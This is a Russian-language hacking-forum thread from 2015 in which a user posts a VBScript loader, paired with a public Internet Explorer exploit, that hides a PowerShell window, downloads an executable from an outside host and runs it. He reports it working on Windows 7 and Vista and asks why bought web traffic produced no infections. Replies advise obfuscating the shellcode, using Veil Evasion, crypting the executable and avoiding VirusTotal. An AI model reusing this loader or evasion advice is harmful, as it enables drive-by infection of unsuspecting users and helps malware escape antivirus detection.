HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 15.12.2015, 00:01
rct
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме:
137330

Репутация: 7
По умолчанию

Цитата:
Сообщение от grimnir  
А это не база с exploit-db?
 
Ответить с цитированием

  #22  
Старый 15.12.2015, 00:07
san-ok
Познающий
Регистрация: 08.11.2015
Сообщений: 31
Провел на форуме:
11327

Репутация: 0
По умолчанию

Цитата:
Сообщение от rct  

А это не база с exploit-db?
это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас
 
Ответить с цитированием

  #23  
Старый 15.12.2015, 00:35
rct
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме:
137330

Репутация: 7
По умолчанию

Цитата:
Сообщение от san-ok  

это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас
Просто показалось что оно на https://github.com/offensive-securit...se-bin-sploits построено.
 
Ответить с цитированием

  #24  
Старый 15.12.2015, 01:10
san-ok
Познающий
Регистрация: 08.11.2015
Сообщений: 31
Провел на форуме:
11327

Репутация: 0
По умолчанию

Еще вопрос, подскажите кто спец.

Кроме MSF я отдельно тестировал вот этот сплоит: https://www.exploit-db.com/exploits/35229/

К нему я прикрепил вот такой загрузчик:

set shell=createobject("Shell.Application")

shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process 'mysoft.exe'", "", "open", 1

При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7.

Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так..

Подскажите плз...или с трафом тем что-то не так...тогда где его брать..
 
Ответить с цитированием

  #25  
Старый 15.12.2015, 01:28
rct
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме:
137330

Репутация: 7
По умолчанию

Антивири очень строго относятся к схеме загрузил mysoft.exe => сразу запустил mysoft.exe Тем более ты скачиваешь стандартными утилитами винды. Ну это моё мнение.
 
Ответить с цитированием

  #26  
Старый 15.12.2015, 01:53
san-ok
Познающий
Регистрация: 08.11.2015
Сообщений: 31
Провел на форуме:
11327

Репутация: 0
По умолчанию

Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?

Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?
 
Ответить с цитированием

  #27  
Старый 15.12.2015, 02:03
private_static
Участник форума
Регистрация: 19.05.2015
Сообщений: 117
Провел на форуме:
25535

Репутация: 22
По умолчанию

Цитата:
Сообщение от san-ok  

Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?
Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?
да так не делаются дела,обычно под это дело приватный софт пишут
 
Ответить с цитированием

  #28  
Старый 15.12.2015, 10:23
gentype
Познающий
Регистрация: 12.07.2015
Сообщений: 65
Провел на форуме:
13323

Репутация: 0
По умолчанию

Цитата:
Сообщение от san-ok  

Еще вопрос, подскажите кто спец.
Кроме MSF я отдельно тестировал вот этот сплоит:
https://www.exploit-db.com/exploits/35229/
К нему я прикрепил вот такой загрузчик:
set shell=createobject("Shell.Application")
shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('
http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process
'mysoft.exe'", "", "open", 1
При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7.
Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так..
Подскажите плз...или с трафом тем что-то не так...тогда где его брать..
Почисти шеллкод, обфусцируй его, наполни мусором, метасплоит умеет генерировать разный мусор, еще посмотри в сторону Veil Evasion фреймворк он в купе с метасплоитом работает. да и еще .exe свой тоже криптони и проверь на сервисе каком нибудь, только не вирустототал!
 
Ответить с цитированием

  #29  
Старый 15.12.2015, 13:33
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062

Репутация: 231


По умолчанию

Цитата:
Сообщение от rct  

А это не база с exploit-db?
не,у меня такое ощущение что авторы как раз с метасплойта их и собирают)

Если по теме уязвимостей и метасплойта то вот хороший китайский сайт http://www.metasploit.cn/forum.php

Через гугл переводчик
 
Ответить с цитированием

  #30  
Старый 15.12.2015, 13:49
rct
Постоянный
Регистрация: 13.06.2015
Сообщений: 359
Провел на форуме:
137330

Репутация: 7
По умолчанию

Цитата:
Сообщение от grimnir  

не,у меня такое ощущение что авторы как раз с метасплойта их и собирают)
Если по теме уязвимостей и метасплойта то вот хороший китайский сайт
http://www.metasploit.cn/forum.php
Через гугл переводчик
Ясно) Оно хоть обновляется? На сайте битые ссылки, запустил ExploitPack.jar, просит обновиться до 5.01
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.